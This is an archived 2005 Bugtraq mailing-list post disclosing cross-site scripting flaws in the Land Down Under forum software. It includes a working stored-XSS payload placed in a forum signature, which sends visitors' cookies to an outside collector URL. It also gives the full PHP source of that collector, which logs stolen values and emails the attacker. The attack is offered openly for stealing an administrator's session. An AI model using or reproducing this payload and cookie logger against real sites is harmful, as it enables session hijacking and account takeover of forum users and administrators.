lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050828075534.26971.qmail@securityfocus.com>
Date: 28 Aug 2005 07:55:34 -0000
From: bendeniz_avci@...mail.com
To: bugtraq@...urityfocus.com
Subject: Land Down Under


Bug finder:spyMASter
Web site:Realhackers.net
Contact:bendeniz_avci@...mail.com

LDU has some xss vulns 
Firstly you can use html codes in your signature you can get cookies with this
put your signature that code

<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT>

and post a topic to forum when admin look this  topic she/he redirect and you can get cookie

this is codes of ekle.php you can save cookie to a  with this php code


<?php
$kayit = fopen("spymaster.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("bendeniz_avci@...mail.com","your cookie ready","http://www.realhackers.net/spyoku.txt",'From: spymaster@...lhackers.net');
?>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ